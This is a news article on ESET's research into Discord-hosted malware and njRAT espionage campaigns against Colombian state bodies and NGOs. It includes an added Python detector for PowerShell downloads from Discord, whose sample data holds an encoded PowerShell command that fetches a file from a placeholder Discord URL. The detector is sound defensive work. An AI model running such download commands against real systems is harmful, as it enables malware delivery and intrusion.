Colombia is the country in Latin America that receives the most cyberattacks: this is the regional panorama

A person uses a laptop, in a file photograph.  EFE/Sascha Steinbach

According to the results of the Discordia operation, carried out by the research laboratory of ESET, a company specializing in the development of cybersecurity software, between the second week of February and March 30, 2022, Colombia was the recipient of 96% of the attacks perpetrated using a method that relies on the Discord messaging platform to host malware, also known as viruses.

This type of cyber threat is aimed at non-governmental organizations and entities of the Colombian state. The attacks are not mass campaigns but targeted ones, so the cybercriminals had determined in advance who their victims would be.

The main objective of these cyber attacks is to steal information, manipulate files and connect infected computers to malicious servers to continue extracting information for a longer period of time.

According to Miguel Ángel Mendoza, computer security specialist at the ESET laboratory, although these recent hacks could be related to the political situation in the country, attacks directed at Colombian organizations have been recorded before.

In this regard, ESET had already carried out two cybersecurity operations, in 2019 and 2021, named Machete and Bandidos respectively, and the results of both investigations already pointed to Colombia as a major recipient of these cyber espionage campaigns against state and non-governmental institutions.

These threats managed to infect the computers of these entities through emails sent to workers reporting an alleged fiscal requirement of the Accusatory Oral Criminal System, with a compressed file to download.

Once the person's attention was captured, a password was requested in order to open the downloaded document, and that password was given in the same email. Next, a virus known as “njRAT”, a remote access Trojan, allowed the attacker to control the computer, with the ability to send files, take screenshots, and activate and deactivate cameras.

In addition to the functions already mentioned, which the attacker controlled remotely, the attacker was also able to identify which keys were pressed while the equipment was in use in order to steal passwords. This practice is known as “keylogging”.

How Discord is related to these cyber attacks in Colombia

The attackers used the public and legitimate messaging service Discord as a platform to host the first malware or virus. From there, a second piece of malware was downloaded, written in PowerShell, a tool used to automate administrative tasks in Windows operating systems.

This second malware connected to Discord again to download a third piece of malware, a Trojan that infects the machine and gives the attacker remote access to the computers in question.
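A defender can look for the second stage of this chain, PowerShell fetching a file from Discord, in process-creation logs. The sketch below is an added example, not ESET's detection logic or code from the original article; the Discord hostnames, the event field names and the sample events are assumptions constructed for illustration.

```python
import base64
import re
# Discord file-hosting domains (general knowledge; the article names none).
DISCORD_HOSTS = ("cdn.discordapp.com", "media.discordapp.net")
URL_RE = re.compile(r"https?://([^/\s'\"]+)[^\s'\"]*", re.I)
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand (base64 of UTF-16LE), or ''."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # covers bad base64 and bad UTF-16
        return ""

def discord_urls(cmdline):
    """Discord-hosted URLs in the command line or in its decoded payload."""
    text = cmdline + " " + decode_encoded_command(cmdline)
    return [m.group(0) for m in URL_RE.finditer(text)
            if m.group(1).lower().split(":")[0] in DISCORD_HOSTS]

def flag_events(events):
    """Flag PowerShell process-creation events that reference Discord files."""
    hits = []
    for ev in events:
        image = ev["image"].lower()
        if not image.endswith(("powershell.exe", "pwsh.exe")):
            continue  # e.g. the Discord client itself is not flagged
        urls = discord_urls(ev["cmdline"])
        if urls:
            hits.append((ev["host"], urls))
    return hits

# Constructed sample data: placeholder URL and hypothetical hosts.
URL = "https://cdn.discordapp.com/attachments/0/0/example.bin"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENC = base64.b64encode(f"Invoke-WebRequest -Uri {URL} -OutFile out.bin"
                       .encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"host": "ws-01", "image": PS, "cmdline": "powershell -enc " + ENC},
    {"host": "ws-02", "image": PS, "cmdline": r"powershell -File C:\Scripts\backup.ps1"},
    {"host": "ws-03", "image": r"C:\Users\a\AppData\Local\Discord\Discord.exe",
     "cmdline": "Discord.exe --url " + URL},
]

if __name__ == "__main__":
    print(flag_events(SAMPLE_EVENTS))
```

Only the first sample event is flagged: the URL is visible only after decoding the `-enc` argument, and the legitimate Discord client on `ws-03` is ignored because the rule keys on the PowerShell image.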

The Discordia operation also collected information about the way in which these groups dedicated to cyber espionage against state and non-governmental institutions operate. As a first step, they thoroughly investigate their possible victims; they then plan how to proceed, execute the attack and, finally, extract the data of interest, which also includes sensitive information about citizens.
